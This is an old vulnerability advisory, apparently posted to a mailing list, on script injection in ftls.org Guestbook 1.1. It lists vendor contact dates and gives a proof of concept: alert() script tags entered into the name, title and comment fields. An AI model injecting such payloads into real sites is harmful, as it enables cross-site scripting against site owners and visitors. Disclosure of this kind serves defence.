ftls.org Guestbook 1.1 Script Injection Vulnerabilities
Discovered By BrainRawt (brainrawt@hotmail.com)
About MyGuestbook:
------------------
Your basic guestbook that can be downloaded at
http://www.ftls.org/en/examples/cgi/Guestbook.shtml#s1.
Vulnerable (tested) Versions:
--------------------
guestbook v 1.1
Vendor Contact:
----------------
9-27-02 - Emailed webmaster@ftls.org
12-15-02 - Emailed tyndiuk@ftls.org
Vulnerability:
----------------
guestbook.cgi inproperly filters user input making the guestbook
vulnerable to script injection.
Exploit (POC):
----------------
When filling in ones name use:
<script>alert('your_name_field_vuln_to_injection')</script>
When filling in the Title use:
<script>alert('title_field_vuln_to_injection')</script>
When filling in the Comment use:
<script>alert('comments_field_vuln')</script>
---------------------------------------------------------------------
Which looks better? Blackhat or White? You Decide! - BrainRawt
_________________________________________________________________
Protect your PC - get McAfee.com VirusScan Online
http://clinic.mcafee.com/clinic/ibuy/campaign.asp?cid=3963
